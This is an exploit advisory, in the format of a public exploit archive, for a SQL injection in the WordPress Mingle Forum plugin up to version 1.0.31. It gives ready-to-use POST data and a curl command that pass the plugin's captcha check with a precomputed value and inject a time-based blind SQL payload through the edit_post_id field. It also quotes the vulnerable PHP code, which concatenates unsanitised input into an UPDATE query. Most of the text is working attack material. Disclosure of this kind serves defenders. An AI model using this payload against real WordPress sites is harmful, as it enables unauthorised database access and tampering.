# Exploit Title: WordPress Mingle Forum plugin <= 1.0.31 SQL Injection Vulnerability # Date: 2011-09-19 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/mingle-forum.1.0.31.zip # Version: 1.0.31 (tested) # Note: wpf_str_encrypt($_POST['wpf_security_code']) == $_POST['wpf_security_check'] --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0) e.g. curl --data "wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php --------------- Vulnerable code --------------- if (!isset($_POST['edit_post_submit'])) { $errormsg = apply_filters('wpwf_check_guestinfo',""); if ($errormsg != "") { $error = true; wp_die($errormsg); } } if($options['forum_captcha'] == true && !$user_ID){ include_once(WPFPATH."captcha/shared.php"); $wpf_code = wpf_str_decrypt($_POST['wpf_security_check']); // wpf_str_decrypt("MhWNow==") == "fail" if(($wpf_code == $_POST['wpf_security_code']) && (!empty($wpf_code))) { // do nothing } else { $error = true; $msg = __("Security code does not match", "mingleforum"); wp_die($msg); } } ... if(isset($_POST['edit_post_submit'])){ $myReplaceSub = array("'", "\\"); $subject = str_replace($myReplaceSub, "", $mingleforum->input_filter($_POST['edit_post_subject'])); $content = $mingleforum->input_filter($_POST['message']); $thread = $mingleforum->check_parms($_POST['thread_id']); $edit_post_id = $_POST['edit_post_id']; if($subject == ""){ $msg .= "

".__("An error occured", "mingleforum")."

"; $msg .= ("

".__("You must enter a subject", "mingleforum")."

"); $error = true; } elseif($content == ""){ $msg .= "

".__("An error occured", "mingleforum")."

"; $msg .= ("

".__("You must enter a message", "mingleforum")."

"); $error = true; } if ($error) wp_die($msg); //SECURITY FIX NEEDED <-- actual author's comment :) $sql = ("UPDATE $mingleforum->t_posts SET text = '$content', subject = '$subject' WHERE id = $edit_post_id"); $wpdb->query($wpdb->prepare($sql)); // misusage of prepare statement(s)